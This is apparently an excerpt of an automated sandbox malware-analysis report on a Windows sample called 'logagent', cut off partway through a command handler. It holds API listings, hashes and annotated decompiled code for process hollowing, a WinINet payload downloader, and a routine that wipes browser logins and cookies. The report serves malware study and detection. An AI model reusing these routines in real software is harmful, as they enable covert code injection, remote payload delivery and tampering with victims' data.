                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004100AC
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004100B5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004100BE
                                  • EnumDisplayDevicesW.USER32(00000000,00000000,00000148,00000000), ref: 004100DF
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004100F5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004100FE
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$DisplayEnum$??0?$basic_string@??1?$basic_string@Devices$G@1@@V01@@$G@2@@0@Hstd@@MonitorsV01@V10@V?$basic_string@Y?$basic_string@
                                  • String ID:
                                  • API String ID: 2807017801-0
                                  • Opcode ID: eb84855e3950ea35a9c7bfda1fc650b5d2b847637b3ce86eaa20f1cf7d9f2166
                                  • Instruction ID: 1aed4e64735882a0db0bb71c951f021fa06bcdcdb304fa8f35c3d61367e112a6
                                  • Opcode Fuzzy Hash: eb84855e3950ea35a9c7bfda1fc650b5d2b847637b3ce86eaa20f1cf7d9f2166
                                  • Instruction Fuzzy Hash: DE21DA7290111EEBDB509BA1DC88EEFBF7CEF19345F004166F50AE2050EB749689CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • _EH_prolog.MSVCRT ref: 00401EA7
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 00401EDE
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041B310,?,0041B310,0041B290), ref: 00401F05
                                    • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                    • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F1C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F29
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F36
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F40
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000060), ref: 00401F55
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F5E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F67
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F70
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F79
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V10@0@V?$basic_string@$??0?$basic_string@$D@1@@$?size@?$basic_string@H_prologV01@@_itoa
                                  • String ID:
                                  • API String ID: 3851886811-0
                                  • Opcode ID: b245657c581309824243aae834912e95f89f18888930cb7fc5c3683aee86cf05
                                  • Instruction ID: 3c13f4a99a68d7d03b3b7bfc4098c6c0fbf2233efe5d64f965fa74e17679f3d5
                                  • Opcode Fuzzy Hash: b245657c581309824243aae834912e95f89f18888930cb7fc5c3683aee86cf05
                                  • Instruction Fuzzy Hash: 3C212FB280010DEBCB05EBD1ED499EEBB78FB54315F14412AF412A7061EB755A48CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetCurrentProcessId.KERNEL32 ref: 1054BF8D
                                    • Part of subcall function 1054D1B8: RegCreateKeyA.ADVAPI32(80000001,10549389,10549389), ref: 1054D1C5
                                    • Part of subcall function 1054D1B8: RegSetValueExA.ADVAPI32(10549389,?,00000000,00000004,004151D4,00000004,004151D4,?,10549389,80000001,00000000), ref: 1054D1E0
                                    • Part of subcall function 1054D1B8: RegCloseKey.ADVAPI32(10549389,?,10549389,80000001,00000000), ref: 1054D1EB
                                  • OpenMutexA.KERNEL32(00100000,00000000), ref: 1054BFCA
                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 1054C063
                                    • Part of subcall function 1054C25D: OpenProcess.KERNEL32(00100000,00000000,?,80000001,?,1054C1FE), ref: 1054C26B
                                    • Part of subcall function 1054C25D: WaitForSingleObject.KERNEL32(00000000,000000FF,?,1054C1FE), ref: 1054C276
                                    • Part of subcall function 1054C25D: CloseHandle.KERNEL32(00000000,?,1054C1FE), ref: 1054C27D
                                  • _wgetenv.MSVCRT ref: 1054C142
                                  • CloseHandle.KERNEL32(00000000), ref: 1054BFD9
                                    • Part of subcall function 105539CA: GetLocalTime.KERNEL32(?), ref: 105539E1
                                    • Part of subcall function 105539CA: printf.MSVCRT ref: 10553A4E
                                    • Part of subcall function 1054CE57: RegOpenKeyExA.ADVAPI32(80000001,105493F8,00000000,00020019,105493F8,?,?,?,105493F8,80000001,00000000), ref: 1054CE76
                                    • Part of subcall function 1054CE57: RegQueryValueExA.ADVAPI32(105493F8,?,00000000,80000001,?,00000000,80000001,?,?,?,105493F8,80000001,00000000), ref: 1054CE94
                                    • Part of subcall function 1054CE57: RegCloseKey.ADVAPI32(105493F8,?,?,?,105493F8,80000001,00000000), ref: 1054CE9F
                                  • _wgetenv.MSVCRT ref: 1054C0E7
                                  • Sleep.KERNEL32(000007D0), ref: 1054C1ED
                                  • CloseHandle.KERNEL32 ref: 1054C239
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close$Open$HandleProcess$Value_wgetenv$CreateCurrentLocalMutexObjectQuerySingleSleepTimeWaitprintf
                                  • String ID: WDH$[INFO]
                                  • API String ID: 2937977308-2767913320
                                  • Opcode ID: 6f1dca8998d8823082caa928487a950551165747325d3f005bae5b6199a57138
                                  • Instruction ID: 19ad8c2934c846753b4f780e9caa88e37245932c779a4ab6438a6790fe7b6faf
                                  • Opcode Fuzzy Hash: 6f1dca8998d8823082caa928487a950551165747325d3f005bae5b6199a57138
                                  • Instruction Fuzzy Hash: E571527690050DEBDB04ABE0EC4E9EE7F7CEF84341F504066F912D2190EBB55A49CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 48%
                                  			E10550BA8() {
                                  				short* _t59;
                                  				void* _t60;
                                  				void _t71;
                                  				void* _t72;
                                  				signed int _t74;
                                  				CONTEXT* _t80;
                                  				intOrPtr _t85;
                                  				intOrPtr* _t93;
                                  				signed int _t95;
                                  				intOrPtr _t100;
                                  				CONTEXT* _t110;
                                  				intOrPtr* _t111;
                                  				struct _PROCESS_INFORMATION* _t114;
                                  				void* _t115;
                                  				void* _t117;
                                  
                                  				L10555859();
                                  				 *((intOrPtr*)(_t115 - 0x10)) = _t117 - 0x70;
                                  				 *(_t115 - 4) =  *(_t115 - 4) & 0x00000000;
                                  				 *((intOrPtr*)(_t115 - 0x78)) = GetProcAddress(GetModuleHandleA(0x4169ec), 0x4169f8);
                                  				_t59 =  *((intOrPtr*)(_t115 + 0xc));
                                  				 *((intOrPtr*)(_t115 - 0x74)) = _t59;
                                  				if( *_t59 != 0x5a4d) {
                                  					L16:
                                  					 *(_t115 - 4) =  *(_t115 - 4) | 0xffffffff;
                                  					_t60 = 0;
                                  				} else {
                                  					_t93 =  *((intOrPtr*)(_t59 + 0x3c)) + _t59;
                                  					 *((intOrPtr*)(_t115 - 0x18)) = _t93;
                                  					if( *_t93 != 0x4550) {
                                  						goto L16;
                                  					} else {
                                  						_t95 = 0x11;
                                  						memset(_t115 - 0x60, 0, _t95 << 2);
                                  						_t114 =  *(_t115 + 0x10);
                                  						asm("stosd");
                                  						asm("stosd");
                                  						asm("stosd");
                                  						asm("stosd");
                                  						if(CreateProcessW(0,  *(_t115 + 8), 0, 0, 0, 4, 0, 0, _t115 - 0x60, _t114) == 0) {
                                  							goto L16;
                                  						} else {
                                  							_t110 = VirtualAlloc(0, 4, 0x1000, 4);
                                  							 *(_t115 - 0x70) = _t110;
                                  							_t110->ContextFlags = 0x10007;
                                  							if(GetThreadContext(_t114->hThread, _t110) == 0 || ReadProcessMemory(_t114->hProcess, _t110->Ebx + 8, _t115 - 0x1c, 4, 0) == 0) {
                                  								goto L16;
                                  							} else {
                                  								_t71 =  *(_t115 - 0x1c);
                                  								if(_t71 ==  *(_t93 + 0x34)) {
                                  									 *((intOrPtr*)(_t115 - 0x78))(_t114->hProcess, _t71);
                                  								}
                                  								_t72 = VirtualAllocEx(_t114->hProcess,  *(_t93 + 0x34),  *(_t93 + 0x50), 0x3000, 0x40);
                                  								 *(_t115 - 0x6c) = _t72;
                                  								if(_t72 == 0) {
                                  									goto L16;
                                  								} else {
                                  									_push(0);
                                  									_push( *((intOrPtr*)(_t93 + 0x54)));
                                  									_push( *((intOrPtr*)(_t115 + 0xc)));
                                  									_push(_t72);
                                  									_push(_t114->hProcess);
                                  									_t111 =  *0x415104;
                                  									if( *_t111() == 0) {
                                  										goto L16;
                                  									} else {
                                  										_t74 = 0;
                                  										 *(_t115 - 0x64) = 0;
                                  										while(_t74 < ( *(_t93 + 6) & 0x0000ffff)) {
                                  											_t100 =  *((intOrPtr*)(_t115 + 0xc));
                                  											_t85 =  *((intOrPtr*)(_t100 + 0x3c)) + (_t74 + _t74 * 4) * 8 + _t100 + 0xf8;
                                  											 *((intOrPtr*)(_t115 - 0x68)) = _t85;
                                  											 *_t111(_t114->hProcess,  *((intOrPtr*)(_t85 + 0xc)) +  *(_t115 - 0x6c),  *((intOrPtr*)(_t85 + 0x14)) + _t100,  *((intOrPtr*)(_t85 + 0x10)), 0);
                                  											 *(_t115 - 0x64) =  *(_t115 - 0x64) + 1;
                                  											_t74 =  *(_t115 - 0x64);
                                  										}
                                  										_push(0);
                                  										_push(4);
                                  										_push(_t93 + 0x34);
                                  										_push( *(_t115 - 0x70)->Ebx + 8);
                                  										_push( *_t114);
                                  										if( *_t111() == 0) {
                                  											goto L16;
                                  										} else {
                                  											_t80 =  *(_t115 - 0x70);
                                  											_t80->Eax =  *((intOrPtr*)(_t93 + 0x28)) +  *(_t115 - 0x6c);
                                  											if(SetThreadContext(_t114->hThread, _t80) == 0 || ResumeThread(_t114->hThread) == 0xffffffff) {
                                  												goto L16;
                                  											} else {
                                  												_t60 = 1;
                                  											}
                                  										}
                                  									}
                                  								}
                                  							}
                                  						}
                                  					}
                                  				}
                                  				 *[fs:0x0] =  *((intOrPtr*)(_t115 - 0xc));
                                  				return _t60;
                                  			}

                                  APIs
                                  • GetModuleHandleA.KERNEL32(004169EC,004169F8), ref: 10550BC9
                                  • GetProcAddress.KERNEL32(00000000), ref: 10550BD0
                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 10550C23
                                  • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 10550C3B
                                  • GetThreadContext.KERNEL32(?,00000000), ref: 10550C50
                                  • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 10550C72
                                  • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 10550C9D
                                  • SetThreadContext.KERNEL32(?,?), ref: 10550D3A
                                  • ResumeThread.KERNEL32(?), ref: 10550D47
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Thread$AllocContextProcessVirtual$AddressCreateHandleMemoryModuleProcReadResume
                                  • String ID: 0BA
                                  • API String ID: 4213851006-415129603
                                  • Opcode ID: 312b707a27dd8bcb1a4e909d494afcf009e2eee7a57a0b06384939ffbc38e31b
                                  • Instruction ID: 356bb68748202ab592250045de71b386063e647c97028593979ceead549de44f
                                  • Opcode Fuzzy Hash: 312b707a27dd8bcb1a4e909d494afcf009e2eee7a57a0b06384939ffbc38e31b
                                  • Instruction Fuzzy Hash: 9A514C71A00205EFDB119FA4CC85FAABBB9FF85750F214169FA14DB2A1D771E844CB18
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B14,?,00000001,?,00000000,?,0040E493,00000000,00000000), ref: 0041343B
                                    • Part of subcall function 0040B708: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                    • Part of subcall function 0040B708: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                    • Part of subcall function 0040B708: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                    • Part of subcall function 0040B708: RegSetValueExA.KERNELBASE(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                    • Part of subcall function 0040B708: RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                    • Part of subcall function 0040B708: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B10,?,00000001,?,00000000,?,0040E493,00000000,00000000), ref: 0041347F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00416D58,00000000,00000001,?,00000000,?,0040E493,00000000,00000000), ref: 004134BA
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B18,?,00000001,?,00000000,?,0040E493,00000000,00000000), ref: 004134F5
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B14,00000000,00000001,?,00000000,?,0040E493,00000000,00000000), ref: 00413537
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B14,?), ref: 00413562
                                  • SystemParametersInfoW.USER32 ref: 00413580
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@D@1@@$??1?$basic_string@?c_str@?$basic_string@?size@?$basic_string@CloseCreateInfoParametersSystemValue
                                  • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                  • API String ID: 3561681748-3576401099
                                  • Opcode ID: 48dd3d0126de30dec13a4ca163c472832330ee869f564e0657d470c6adcd1593
                                  • Instruction ID: 9cbbbfad74e45987a2bd5f73a37c109ae42610d4aeaf5eddbb83fc0603d2e269
                                  • Opcode Fuzzy Hash: 48dd3d0126de30dec13a4ca163c472832330ee869f564e0657d470c6adcd1593
                                  • Instruction Fuzzy Hash: 5041A772B50604BBEB1076A59C47FEF393ED780B50F51006AF9116B2C1D7AA8AC446EF
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 88%
			E00412553(void* __ecx, void* __eflags, char* _a4, void** _a8, unsigned int _a12, signed int _a15) {
				// Downloader (decompiler output, comments added). Fetches the URL passed in
				// _a4 over WinINet into a heap buffer that is grown by allocate/copy/free
				// on every chunk; returns the buffer in *_a8, its size in *_a12 and 1 on
				// success. The _a4 and _a12 parameter slots are reused as locals below.
				void* _v8; // URL handle
				char* _v12;
				void* _v16; // WinINet session handle
				void _v10016; // 10000-byte (0x2710) receive buffer
				void* _t35;
				void* _t36;
				void* _t42;
				void* _t44;
				void* _t46;
				unsigned int* _t55;
				signed int _t57;
				signed int _t58;
				signed int _t64;
				signed int _t74;
				char* _t98;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;

				E00413ED0(0x271c, __ecx); // stack probe for the large local buffer
				_t55 = _a12; // out: total size
				_a15 = _a15 & 0x00000000; // success flag
				_t98 = 0;
				 *_a8 = 0; // out: buffer pointer
				 *_t55 = 0;
				_t35 = InternetOpenA("user", 1, 0, 0, 0); // User-Agent "user", 1 = INTERNET_OPEN_TYPE_DIRECT
				_v16 = _t35;
				_t36 = InternetOpenUrlA(_t35, _a4, 0, 0, 0x80000000, 0); // 0x80000000 = INTERNET_FLAG_RELOAD
				_v8 = _t36;
				if(_t36 != 0) {
					_a12 = 0; // bytes returned by the last InternetReadFile
					_a4 = 0; // data accumulated so far
					while(1) {
						_t10 =  &_a12; // 0x415664
						_t42 = InternetReadFile(_v8,  &_v10016, 0x2710, _t10);
						if(_t42 != 0 && _a12 <= _t98) {
							break; // successful read of 0 bytes = end of stream; as decompiled, a failed read (_t42 == 0) does not leave the loop
						}
						_t44 =  *_t55 + _a12;
						_push(_t44);
						L00413E84(); // operator new(total + chunk); ??2@YAPAXI@Z in the API list
						_t57 =  *_t55;
						_t100 = _a4;
						_t58 = _t57 >> 2;
						_v12 = memcpy(_t44, _t100, _t58 << 2); // copy the old data (inlined rep movsd / movsb pair)
						_push(_a4);
						_t46 = memcpy(_t100 + _t58 + _t58, _t100, _t57 & 0x00000003);
						_t101 =  &_v10016;
						_t64 = _a12 >> 2;
						memcpy(_t101 + _t64 + _t64, _t101, memcpy(_t46 +  *_t55, _t101, _t64 << 2) & 0x00000003); // append the new chunk
						_t103 = _t103 + 0x30;
						L00413EBE(); // operator delete(old buffer); ??3@YAXPAX@Z in the API list
						_a4 = _v12;
						 *_t55 =  *_t55 + _a12;
						_t98 = 0;
					}
					_push( *_t55);
					L00413E84(); // operator new(total): final copy handed to the caller
					_t102 = _a4;
					 *_a8 = _t42;
					_t74 =  *_t55 >> 2;
					memcpy(_t102 + _t74 + _t74, _t102, memcpy(_t42, _t102, _t74 << 2) & 0x00000003);
					_a15 = 1;
				}
				InternetCloseHandle(_v16);
				InternetCloseHandle(_v8);
				return _a15;
			}

                                  APIs
                                  • InternetOpenA.WININET(user,00000001,00000000,00000000,00000000), ref: 0041257C
                                  • InternetOpenUrlA.WININET(00000000,0040E1CA,00000000,00000000,80000000,00000000), ref: 00412591
                                  • InternetReadFile.WININET(00000000,?,00002710,dVA), ref: 004125BC
                                  • ??2@YAPAXI@Z.MSVCRT ref: 004125D1
                                  • ??3@YAXPAX@Z.MSVCRT ref: 0041260C
                                  • ??2@YAPAXI@Z.MSVCRT ref: 00412624
                                  • InternetCloseHandle.WININET(?), ref: 00412652
                                  • InternetCloseHandle.WININET(00000000), ref: 00412657
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$??2@CloseHandleOpen$??3@FileRead
                                  • String ID: dVA$user
                                  • API String ID: 3314639739-756348157
                                  • Opcode ID: 2c425c2ac83949829cfd64d28bcc986e464b329bf07d6f53e08b57cf980523a3
                                  • Instruction ID: 2817f394542dad185436be8b0d9cd541a8c5b80d7f45bfec7e57154c42759719
                                  • Opcode Fuzzy Hash: 2c425c2ac83949829cfd64d28bcc986e464b329bf07d6f53e08b57cf980523a3
                                  • Instruction Fuzzy Hash: FC316A31A00229AFCF25DF68D885ADF7FA9FF49350F14406AF909D7250CA74AA90DB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 57%
			E004078BB(void* __ecx) {
				// Browser-data clearing worker (decompiler output, comments added). After a
				// delay read from a global it runs five per-browser clearing routines,
				// retrying every 5 s until all of them report success, then logs the result.
				signed int _v5;
				signed int _v6;
				signed int _v7;
				signed int _v8;
				void* _t40;
				void* _t44;

				_push(__ecx);
				 *0x41b9b8 = 1; // busy flag, cleared again before returning
				Sleep( *0x41b9b4); // initial delay taken from a global
				_v5 = _v5 & 0x00000000;
				_v6 = _v6 & 0x00000000;
				_v7 = _v7 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_t44 = 0;
				do {
					if(_v5 == 0) {
						L2:
						_v5 = E00407767(); // logs "[IE cookies cleared!]" (see its subcall list below)
					}
					if(_v6 == 0) {
						_v6 = E0040751B();
					}
					if(_v8 == 0) {
						_v8 = E0040728F();
					}
					if(_v7 == 0) {
						_v7 = E004071CF();
					}
					if(_t44 == 0) {
						_t44 = E0040710F();
					}
					if(_v5 == 0 || _v6 == 0 || _v7 == 0 || _t44 == 0 || _v8 == 0) {
						Sleep(0x1388); // 5000 ms before the next attempt
					}
					if(_v5 == 0) {
						goto L2;
					}
				} while (_v6 == 0 || _v7 == 0 || _t44 == 0 || _v8 == 0); // loop until every routine returned non-zero
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
				E00407A90("\n[Cleared browsers logins and cookies.]\n");
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
				E0041203B("[INFO]",  &_v7, "Cleared browsers logins and cookies.",  &_v8,  &_v8); // "[INFO]" log entry
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v8);
				_t40 = E004020C2(0x41be70, 0xaf, 0x415664); // helper also called from E00407B8C below; its purpose is not visible in this listing
				if( *0x41b9b0 != 0) {
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					E0040B829(0x80000001, _t40, "FR", 1); // 0x80000001 = HKEY_CURRENT_USER, so most likely a registry write of a value named "FR" (inferred)
				}
				 *0x41b9b8 =  *0x41b9b8 & 0x00000000; // busy flag off
				return 0;
			}

                                  APIs
                                  • Sleep.KERNEL32 ref: 004078D4
                                  • Sleep.KERNEL32(00001388), ref: 0040794C
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Cleared browsers logins and cookies.],?), ref: 0040797C
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Cleared browsers logins and cookies.,?), ref: 00407992
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 004079A6
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 004079BF
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041601C,00000001,000000AF), ref: 004079E9
                                    • Part of subcall function 00407767: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000,761B6490,00000000), ref: 00407779
                                    • Part of subcall function 00407767: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004077A1
                                    • Part of subcall function 00407767: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004077AA
                                    • Part of subcall function 00407767: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664), ref: 004077B9
                                    • Part of subcall function 00407767: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies cleared!],00000000), ref: 00407867
                                    • Part of subcall function 00407767: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004078AF
                                  Strings
                                  • Cleared browsers logins and cookies., xrefs: 0040798D
                                  • [INFO], xrefs: 004079A1
                                  • [Cleared browsers logins and cookies.], xrefs: 00407977
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@D@1@@$??1?$basic_string@Sleep$??4?$basic_string@??8std@@?c_str@?$basic_string@D@2@@0@V01@V01@@V?$basic_string@
                                  • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.$[INFO]
                                  • API String ID: 3797260644-945983296
                                  • Opcode ID: 369653c07c44033f8c78b9710eaf8dde3d201190c08debfa228cc0d3496692d7
                                  • Instruction ID: 70147e8437466b13765d015bb4740f5a08e73b30c638215b5aa9753a2d15767b
                                  • Opcode Fuzzy Hash: 369653c07c44033f8c78b9710eaf8dde3d201190c08debfa228cc0d3496692d7
                                  • Instruction Fuzzy Hash: 733146B1D5D28879FB11F3E5890ABED7EA48B51354F1880ABD840222D2C7BD1A88D35B
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 29%
			E00407B8C(intOrPtr* __eax, void* __eflags, intOrPtr _a4, void* _a8) {
				// Command handler (decompiler output, comments added). _t49 selects the
				// action; the text after the first four characters of the command is
				// its argument.
				char _v20;
				char _v36;
				void* _t19;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				char* _t29;
				void* _t38;
				intOrPtr _t49;
				void* _t50;
				void* _t53;

				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t49 =  *__eax; // command selector
				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z(); // argument = substr(4, ...) per the API list below
